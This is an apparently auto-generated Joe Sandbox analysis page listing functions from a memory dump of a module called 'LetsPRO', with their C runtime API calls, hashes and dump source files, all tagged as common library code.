                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __fassign$_errno_invalid_parameter_noinfo$__wsopen_s
                                        • String ID: UNICODE$UTF-16LE$UTF-8$ccs
                                        • API String ID: 4135599424-3573488595
                                        • Opcode ID: be6a2526e5901396b4f402d3bbf74fc3187862875cb47848eb353219b0a4fe40
                                        • Instruction ID: 03f5c4fe067a75d2b1f8a1c43d1ee0b2f87f84b3f7f4894bd2e3aad32dd981c6
                                        • Opcode Fuzzy Hash: be6a2526e5901396b4f402d3bbf74fc3187862875cb47848eb353219b0a4fe40
                                        • Instruction Fuzzy Hash: EB616AF5D09345EEEB02CF7A8455799BFB8BB02308FA44269D95593D82D3B4C2B5CB01
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C9740BC Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 73stringCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_catch.LIBCMT ref: 6C9740C3
                                        • _getptd.MSVCR100(00000004,6C974A47,?,?,E06D7363,1FFFFFFF,19930522), ref: 6C9740C8
                                        • ?_inconsistency@@YAXXZ.MSVCR100 ref: 6C9740D6
                                          • Part of subcall function 6C973954: DecodePointer.KERNEL32(6C973990,00000008,6C9744B7,6C9744D8,0000000C,6C97452F,?,?,00000003,00000000,6C974588,00000008,6C92CB7F,?,00000000,00000003), ref: 6C973966
                                          • Part of subcall function 6C973954: ?terminate@@YAXXZ.MSVCR100(?,00000000,00000003,?), ref: 6C973986
                                        • ?unexpected@@YAXXZ.MSVCR100 ref: 6C9740DF
                                        • ?terminate@@YAXXZ.MSVCR100 ref: 6C9740EA
                                        • _getptd.MSVCR100 ref: 6C9740EF
                                        • _CxxThrowException.MSVCR100(00000000,00000000), ref: 6C974101
                                        • ?_inconsistency@@YAXXZ.MSVCR100(?,00000000,?,00000000,00000000), ref: 6C974115
                                        • ?_inconsistency@@YAXXZ.MSVCR100(?,00000000,?,00000000,00000000), ref: 6C974120
                                        • ?_inconsistency@@YAXXZ.MSVCR100(?,00000000,?,00000000,00000000), ref: 6C97414B
                                        • ?raw_name@type_info@@QBEPBDXZ.MSVCR100(0000005E,?,00000000,?,00000000,00000000), ref: 6C974169
                                        • strcmp.MSVCR100(00000000,0000005E,?,00000000,?,00000000,00000000), ref: 6C97416F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ?_inconsistency@@$?terminate@@_getptd$?raw_name@type_info@@?unexpected@@DecodeExceptionH_prolog3_catchPointerThrowstrcmp
                                        • String ID: csm
                                        • API String ID: 2156745037-1018135373
                                        • Opcode ID: bfeff9f72e9229ae94bde2a8e0c8ef366c40d302cd8aa1b6332df6f0f4ea8f64
                                        • Instruction ID: 187ca03a73394d8b19a128d3db9589829ea17617c4252b2b31c4d96e01324003
                                        • Opcode Fuzzy Hash: bfeff9f72e9229ae94bde2a8e0c8ef366c40d302cd8aa1b6332df6f0f4ea8f64
                                        • Instruction Fuzzy Hash: 84212935502210DBCB30EFB8C840BD9B3ACAF30329F254418D9688BF42C730EA499EB1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C90A39E Relevance: 22.6, APIs: 15, Instructions: 116COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • free.MSVCR100(?,6C9043EA,-0000006C,?,?,6C90A421,-0000006C,-0000006C,?,?,6C9052D4,-0000006C), ref: 6C90A404
                                        • free.MSVCR100(?,6C9043EA,-0000006C,?,?,6C90A421,-0000006C,-0000006C,?,?,6C9052D4,-0000006C), ref: 6C916F3C
                                        • ___free_lconv_mon.LIBCMT ref: 6C916F47
                                        • free.MSVCR100(?,6C9043EA,-0000006C,?,?,6C90A421,-0000006C,-0000006C,?,?,6C9052D4,-0000006C), ref: 6C916F5D
                                        • ___free_lconv_num.LIBCMT ref: 6C916F68
                                        • free.MSVCR100(?,6C9043EA,-0000006C,?,?,6C90A421,-0000006C,-0000006C,?,?,6C9052D4,-0000006C), ref: 6C916F75
                                        • free.MSVCR100(?,?,6C9043EA,-0000006C,?,?,6C90A421,-0000006C,-0000006C,?,?,6C9052D4,-0000006C), ref: 6C916F80
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: free$___free_lconv_mon___free_lconv_num
                                        • String ID:
                                        • API String ID: 2838340673-0
                                        • Opcode ID: 5adbdcf89ae0ecfe415bed28986425780516a396bf90d9cd914a4582f636c5a5
                                        • Instruction ID: dfb8ea0f64d4a182969ad964209bcca1bdcd8c4ee6185fac6f2e3447a7d8a9cb
                                        • Opcode Fuzzy Hash: 5adbdcf89ae0ecfe415bed28986425780516a396bf90d9cd914a4582f636c5a5
                                        • Instruction Fuzzy Hash: 0131A072609345DFD7215FA9DC80A8A77FAEB10318F20196EE15A87E50DF30E9C4CA51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C900F91 Relevance: 21.2, APIs: 14, Instructions: 152COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _fileno$__cftof
                                        • String ID:
                                        • API String ID: 813615167-0
                                        • Opcode ID: 22484d37a2986a484b6218e65a98760f4a5793a3ab41a815a898fad9ecfe610b
                                        • Instruction ID: 0ac06d1b4e457e9a50a426a5bb657569b1368fa697c178268359b14afeb35a6c
                                        • Opcode Fuzzy Hash: 22484d37a2986a484b6218e65a98760f4a5793a3ab41a815a898fad9ecfe610b
                                        • Instruction Fuzzy Hash: 184137322096589AC3044F38ED429EE37A8BF23368330069DE5749BED0DF31D656CAD4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C9768C6 Relevance: 21.2, APIs: 14, Instructions: 151COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __aligned_offset_malloc.LIBCMT(?,?,?), ref: 6C9768E1
                                          • Part of subcall function 6C9767B4: _errno.MSVCR100 ref: 6C9767C4
                                          • Part of subcall function 6C9767B4: _invalid_parameter_noinfo.MSVCR100 ref: 6C9767CF
                                        • __aligned_free.LIBCMT(?), ref: 6C9768F3
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __aligned_free__aligned_offset_malloc_errno_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 2665303786-0
                                        • Opcode ID: c3203d8506c5f9095ed7d25bf43c2bf2026a80044cc667457f7c84c89af0cf1a
                                        • Instruction ID: 8d4a6f3ec26b7078c3cc2831af9435c77002c1302bc1272a20dbf1fbfe31761b
                                        • Opcode Fuzzy Hash: c3203d8506c5f9095ed7d25bf43c2bf2026a80044cc667457f7c84c89af0cf1a
                                        • Instruction Fuzzy Hash: 05519172A0520ADFCF14CF68D8806EEBBB5FF54358B148569E815E7744EB31DA44CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C901D6F Relevance: 21.1, APIs: 14, Instructions: 108threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __set_flsgetvalue.MSVCR100(6C901E10,00000008,6C901E46,00000001,?), ref: 6C901D9A
                                          • Part of subcall function 6C900371: TlsGetValue.KERNEL32(?,6C900743), ref: 6C90037A
                                        • TlsGetValue.KERNEL32(6C901E10,00000008,6C901E46,00000001,?), ref: 6C901DAB
                                        • _calloc_crt.MSVCR100(00000001,00000214), ref: 6C901DBE
                                        • DecodePointer.KERNEL32(00000000), ref: 6C901DDC
                                        • _initptd.MSVCR100(00000000,00000000), ref: 6C901DEE
                                          • Part of subcall function 6C901ECB: GetModuleHandleW.KERNEL32(KERNEL32.DLL,6C901F68,00000008,6C927629,00000000,00000000), ref: 6C901EDC
                                          • Part of subcall function 6C901ECB: _lock.MSVCR100(0000000D), ref: 6C901F10
                                          • Part of subcall function 6C901ECB: InterlockedIncrement.KERNEL32(?), ref: 6C901F1D
                                          • Part of subcall function 6C901ECB: _lock.MSVCR100(0000000C), ref: 6C901F31
                                        • GetCurrentThreadId.KERNEL32 ref: 6C901DF5
                                        • __freeptd.LIBCMT ref: 6C9029A1
                                        • __heap_init.LIBCMT ref: 6C90B901
                                        • GetCommandLineA.KERNEL32(6C901E10,00000008,6C901E46,00000001,?), ref: 6C90B932
                                        • GetCommandLineW.KERNEL32 ref: 6C90B93D
                                        • __ioterm.LIBCMT ref: 6C917BBE
                                        • free.MSVCR100(00000000), ref: 6C9274C5
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CommandLineValue_lock$CurrentDecodeHandleIncrementInterlockedModulePointerThread__freeptd__heap_init__ioterm__set_flsgetvalue_calloc_crt_initptdfree
                                        • String ID:
                                        • API String ID: 2121586863-0
                                        • Opcode ID: 67c4d0b8fa444e5467ab9b2a47f20365a6d292143dd2a2ec79f8b29d6e8524e2
                                        • Instruction ID: c2368a5f30cf8b8d9088b946f844e3e9e90c01a8448048d87e8172f82648e30a
                                        • Opcode Fuzzy Hash: 67c4d0b8fa444e5467ab9b2a47f20365a6d292143dd2a2ec79f8b29d6e8524e2
                                        • Instruction Fuzzy Hash: 2631EF3178AA469ADB112BF9D80558E3AF9AF7375DB30052ED860C2E50DF21C188DA72
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C90E4B4 Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 98COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: NameName::Name::operator=
                                        • String ID: class $coclass $cointerface $enum $struct $union $unknown ecsu'
                                        • API String ID: 1765408024-3025788322
                                        • Opcode ID: 7af9e9ab6b1e0af3f636c0332378286015184f83b12caac8ef2aaa7767234f06
                                        • Instruction ID: 53d6011961952943a2d9fe1a6d9d55a0825189a0a96b8e84f06750b6bcfdd326
                                        • Opcode Fuzzy Hash: 7af9e9ab6b1e0af3f636c0332378286015184f83b12caac8ef2aaa7767234f06
                                        • Instruction Fuzzy Hash: D2319E72A14A08EBCF04CB98C840AFD77B8FF99754F10489EE491A3B40EB34DA44CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C940192 Relevance: 19.7, APIs: 13, Instructions: 172COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • ??2@YAPAXI@Z.MSVCR100(00000008,F3B6147F,?,?), ref: 6C9401CF
                                          • Part of subcall function 6C90235B: malloc.MSVCR100(?), ref: 6C902366
                                        • ?GetProcessorNodeCount@Concurrency@@YAIXZ.MSVCR100(F3B6147F,?,?), ref: 6C94020A
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000,F3B6147F,?,?), ref: 6C940223
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000,F3B6147F,?,?), ref: 6C94023E
                                        • _memset.LIBCMT(?,00000000,?,F3B6147F,?,?), ref: 6C940252
                                        • _memset.LIBCMT(?,00000000,?,F3B6147F,?,?), ref: 6C940265
                                        • CreateSemaphoreW.KERNEL32(00000000,00000000,7FFFFFFF,00000000,?,?,?,F3B6147F,?,?), ref: 6C9402B5
                                        • GetLastError.KERNEL32(?,?,?,F3B6147F,?,?), ref: 6C9402C5
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,F3B6147F,?,?), ref: 6C9402DE
                                        • _CxxThrowException.MSVCR100(?,6C9A0D48,00000000,?,?,?,F3B6147F,?,?), ref: 6C9402ED
                                        • ??2@YAPAXI@Z.MSVCR100(0000000C,?,?,?,F3B6147F,?,?), ref: 6C9402F4
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000,?,?,?,F3B6147F,?,?), ref: 6C940321
                                        • _memset.LIBCMT(00000000,00000000,00000000,?,?,?,F3B6147F,?,?), ref: 6C940332
                                          • Part of subcall function 6C941741: _memset.LIBCMT(?,00000000,0000003E,00000000,00000000), ref: 6C941760
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _memset$??2@$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorConcurrency@@Count@CreateErrorExceptionLastNodeProcessorSemaphoreThrowmalloc
                                        • String ID:
                                        • API String ID: 1488694034-0
                                        • Opcode ID: 01d6f91056819032bcbaa4e3139dbd1142e20fa59518ada80012190f70ef9ce4
                                        • Instruction ID: 3264cbf1c29c5f5ce8b4bac1bb6297e2b70c9ed6d6bd3e29ef76634e9e648bb3
                                        • Opcode Fuzzy Hash: 01d6f91056819032bcbaa4e3139dbd1142e20fa59518ada80012190f70ef9ce4
                                        • Instruction Fuzzy Hash: 1F51C3B1604741DFD724CF38D885A6ABBE8FF58354F108A3EE15AC7A90EB31E8458B44
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C90CC3E Relevance: 19.6, APIs: 13, Instructions: 145COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • wcsnlen.MSVCR100(?,?,?,?,?,?,?,?,6C90CCCF,?,?,?), ref: 6C90CC62
                                        • _errno.MSVCR100(?,?,?,?,?,?,6C90CCCF,?,?,?), ref: 6C92C897
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,?,6C90CCCF,?,?,?), ref: 6C92C8A1
                                        • ___crtLCMapStringW.LIBCMT(?,00000200,?,000000FF,00000000,00000000,?,?,?,?,?,?,6C90CCCF,?,?,?), ref: 6C92C8BE
                                        • _errno.MSVCR100(?,?,6C90CCCF,?,?,?), ref: 6C92C8CF
                                        • _errno.MSVCR100(?,?,6C90CCCF,?,?,?), ref: 6C92C8DA
                                        • _errno.MSVCR100(?,?,6C90CCCF,?,?,?), ref: 6C92C8F0
                                        • malloc.MSVCR100(00000008,?,?,6C90CCCF,?,?,?), ref: 6C92C928
                                        • _errno.MSVCR100(?,?,6C90CCCF,?,?,?), ref: 6C92C944
                                        • ___crtLCMapStringW.LIBCMT(?,00000200,?,000000FF,00000000,00000000,?,?,6C90CCCF,?,?,?), ref: 6C92C95F
                                        • wcscpy_s.MSVCR100(?,?,00000000,?,?,?,?,?,?,?,?,6C90CCCF,?,?,?), ref: 6C92C970
                                        • _freea_s.MSVCR100(00000000,?,?,?,?,?,?,?,?,6C90CCCF,?,?,?), ref: 6C92C989
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$String___crt$_freea_s_invalid_parameter_noinfomallocwcscpy_swcsnlen
                                        • String ID:
                                        • API String ID: 4082481270-0
                                        • Opcode ID: 31e368d2918278e371e1a75c8bd183b851658c4971b865cd657a032219a386e3
                                        • Instruction ID: 5c795bb6669d359440b0dcbb6909a4efa77cba8000f786b4b07d4bbebe1d7a4e
                                        • Opcode Fuzzy Hash: 31e368d2918278e371e1a75c8bd183b851658c4971b865cd657a032219a386e3
                                        • Instruction Fuzzy Hash: 13413871714111EFF7147F68CC809AE37A8EF16328B1045ADE445DBB90EB34CD4493A2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C903805 Relevance: 19.6, APIs: 13, Instructions: 145COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • wcsnlen.MSVCR100(?,?,?,?,?,?,?,?,6C9038A3,?,?,?), ref: 6C903829
                                        • _errno.MSVCR100(?,?,?,?,?,?,6C9038A3,?,?,?), ref: 6C92C5EC
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,?,6C9038A3,?,?,?), ref: 6C92C5F6
                                        • ___crtLCMapStringW.LIBCMT(?,00000100,?,000000FF,00000000,00000000,?,?,?,?,?,?,6C9038A3,?,?,?), ref: 6C92C613
                                        • _errno.MSVCR100(?,?,6C9038A3,?,?,?), ref: 6C92C624
                                        • _errno.MSVCR100(?,?,6C9038A3,?,?,?), ref: 6C92C62F
                                        • _errno.MSVCR100(?,?,6C9038A3,?,?,?), ref: 6C92C645
                                        • malloc.MSVCR100(00000008,?,?,6C9038A3,?,?,?), ref: 6C92C67D
                                        • _errno.MSVCR100(?,?,6C9038A3,?,?,?), ref: 6C92C699
                                        • ___crtLCMapStringW.LIBCMT(?,00000100,?,000000FF,00000000,00000000,?,?,6C9038A3,?,?,?), ref: 6C92C6B4
                                        • wcscpy_s.MSVCR100(?,?,00000000,?,?,?,?,?,?,?,?,6C9038A3,?,?,?), ref: 6C92C6C5
                                        • _freea_s.MSVCR100(00000000,?,?,?,?,?,?,?,?,6C9038A3,?,?,?), ref: 6C92C6DE
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$String___crt$_freea_s_invalid_parameter_noinfomallocwcscpy_swcsnlen
                                        • String ID:
                                        • API String ID: 4082481270-0
                                        • Opcode ID: d637b543efbb210d2219f03cdb8367e472591f6eca051706afbc18262ab17019
                                        • Instruction ID: d00274e24418820e874b0838e89b8e3a9d193ba67a4b6c9a817775b082c42322
                                        • Opcode Fuzzy Hash: d637b543efbb210d2219f03cdb8367e472591f6eca051706afbc18262ab17019
                                        • Instruction Fuzzy Hash: 0341D571714102AFFB156F68DC80DAE37A8FF56318B2011AEE844DBB94EB74CD4487A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C904DD0 Relevance: 19.6, APIs: 13, Instructions: 140stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _malloc_crt.MSVCR100(00000355,00000000,6C905289,00000001,00000000,00000000), ref: 6C904DE4
                                          • Part of subcall function 6C900B61: malloc.MSVCR100(00000001,00000001,00000001,?,6C90A9B4,00000018,6C90A988,0000000C,6C927537,00000001,00000001,?,6C901F15,0000000D), ref: 6C900B6D
                                          • Part of subcall function 6C904D96: strcat_s.MSVCR100(6C906E68,6C906E47,6C906E58,?,00000083,00000083,?,6C906E5C,6C906E47,6C906E68,00000002,6C906E68,6C906E47,?,00000000,00000000), ref: 6C904DB5
                                        • strcat_s.MSVCR100(00000004,00000351,6C904D94,?,?,?,?,?,00000000,6C905289,00000001,00000000), ref: 6C904E31
                                        • strcmp.MSVCR100(00000000,00000010,?,?,?,?,?,?,?,?,00000000,6C905289,00000001,00000000), ref: 6C904E4E
                                        • free.MSVCR100(6C905289,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C904E95
                                        • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000,6C905289,00000001), ref: 6C930C41
                                        • free.MSVCR100(?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000,6C905289), ref: 6C930C49
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: freestrcat_s$__invoke_watson_malloc_crtmallocstrcmp
                                        • String ID:
                                        • API String ID: 1358975119-0
                                        • Opcode ID: b74d81bc7c85c47e61725398da5ea890d6beb4c0bee40c5f9c7513060cfd902e
                                        • Instruction ID: 259341ffc47c42ed18235649a0300ba395f5814f9fce3447f996188230e2c569
                                        • Opcode Fuzzy Hash: b74d81bc7c85c47e61725398da5ea890d6beb4c0bee40c5f9c7513060cfd902e
                                        • Instruction Fuzzy Hash: E541BDB1A04749AFDB119FAACC80A5AB7F8BF2574CF10486CE50597E61E775EA44CF00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C902813 Relevance: 19.6, APIs: 13, Instructions: 110COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _lock.MSVCR100(0000000D,6C9028F8,00000008,6C902982,00000000,?,6C9029A6,00000000,6C901E10,00000008,6C901E46,00000001,?), ref: 6C902887
                                          • Part of subcall function 6C900940: EnterCriticalSection.KERNEL32(00000001,00000001,?,6C901F15,0000000D), ref: 6C90095B
                                        • InterlockedDecrement.KERNEL32(?), ref: 6C902899
                                        • _lock.MSVCR100(0000000C,6C9028F8,00000008,6C902982,00000000,?,6C9029A6,00000000,6C901E10,00000008,6C901E46,00000001,?), ref: 6C9028B5
                                        • free.MSVCR100(00000000,6C9028F8,00000008,6C902982,00000000,?,6C9029A6,00000000,6C901E10,00000008,6C901E46,00000001,?), ref: 6C9028E9
                                        • free.MSVCR100(00000000), ref: 6C927655
                                        • free.MSVCR100(?,6C9028F8,00000008,6C902982,00000000,?,6C9029A6,00000000,6C901E10,00000008,6C901E46,00000001,?), ref: 6C927661
                                        • free.MSVCR100(?,6C9028F8,00000008,6C902982,00000000,?,6C9029A6,00000000,6C901E10,00000008,6C901E46,00000001,?), ref: 6C92766D
                                        • free.MSVCR100(?,6C9028F8,00000008,6C902982,00000000,?,6C9029A6,00000000,6C901E10,00000008,6C901E46,00000001,?), ref: 6C927679
                                        • free.MSVCR100(?,6C9028F8,00000008,6C902982,00000000,?,6C9029A6,00000000,6C901E10,00000008,6C901E46,00000001,?), ref: 6C927685
                                        • free.MSVCR100(?,6C9028F8,00000008,6C902982,00000000,?,6C9029A6,00000000,6C901E10,00000008,6C901E46,00000001,?), ref: 6C927691
                                        • free.MSVCR100(?,6C9028F8,00000008,6C902982,00000000,?,6C9029A6,00000000,6C901E10,00000008,6C901E46,00000001,?), ref: 6C92769D
                                        • free.MSVCR100(?,6C9028F8,00000008,6C902982,00000000,?,6C9029A6,00000000,6C901E10,00000008,6C901E46,00000001,?), ref: 6C9276A9
                                        • free.MSVCR100(?,?,6C9029A6,00000000,6C901E10,00000008,6C901E46,00000001,?), ref: 6C9276B5
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: free$_lock$CriticalDecrementEnterInterlockedSection
                                        • String ID:
                                        • API String ID: 3254847666-0
                                        • Opcode ID: ec60d17f02ed772bbc0a037e82eef35db18bc275b4ad9c08d2feaffcbd64e3d3
                                        • Instruction ID: 65c89d0ef97515ea3a66ca6ff6a43f207d71b92d5a6cfa859f52c0318e57f2a3
                                        • Opcode Fuzzy Hash: ec60d17f02ed772bbc0a037e82eef35db18bc275b4ad9c08d2feaffcbd64e3d3
                                        • Instruction Fuzzy Hash: BB31F035306F019AD7019EB99948F4E33FC7F71B1CB20059DD855ABE80EB38E0C48611
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C912668 Relevance: 19.6, APIs: 13, Instructions: 93COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
